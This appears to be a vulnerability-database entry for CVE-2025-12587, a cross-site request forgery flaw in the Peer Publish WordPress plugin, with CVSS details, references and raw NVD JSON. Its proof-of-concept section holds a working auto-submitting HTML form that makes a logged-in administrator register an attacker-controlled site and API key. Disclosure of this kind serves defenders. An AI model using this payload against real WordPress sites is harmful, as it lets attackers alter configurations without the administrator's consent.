CVE-2025-12587

Description

The Peer Publish plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on the website management pages. This makes it possible for unauthenticated attackers to add, modify, or delete website configurations via a forged request granted they can trick an administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Peer Publish插件 <= 1.0 所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2025-12587: Add malicious website configuration -->
<html>
  <body>
    <h1>CVE-2025-12587 CSRF Attack PoC</h1>
    <p>诱骗管理员提交恶意网站配置</p>
    
    <!-- Add new website configuration -->
    <form action="http://target-site/wp-admin/admin.php?page=peer-publish-new-website" method="POST" id="csrfForm">
      <input type="hidden" name="action" value="peer_publish_save_website" />
      <input type="hidden" name="website_name" value="Malicious Site" />
      <input type="hidden" name="website_url" value="https://malicious-site.com" />
      <input type="hidden" name="website_api_key" value="attacker-controlled-key" />
      <input type="hidden" name="submit" value="Save Website" />
    </form>
    
    <script>
      // Auto-submit form when page loads
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12587
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12587
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12587/
[4] VulDB https://vuldb.com/cve/CVE-2025-12587
[5] https://plugins.trac.wordpress.org/browser/peer-publish/tags/1.0/admin/admin-pages/newwebsite.php#L17
[6] https://plugins.trac.wordpress.org/browser/peer-publish/tags/1.0/admin/admin-pages/websites.php#L20
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/fffa6c31-8da0-48d7-b603-64f50950787b?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12587", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:48.913", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Peer Publish plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on the website management pages. This makes it possible for unauthenticated attackers to add, modify, or delete website configurations via a forged request granted they can trick an administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/peer-publish/tags/1.0/admin/admin-pages/newwebsite.php#L17", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/peer-publish/tags/1.0/admin/admin-pages/websites.php#L20", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fffa6c31-8da0-48d7-b603-64f50950787b?source=cve", "source": "[email protected]"}]}}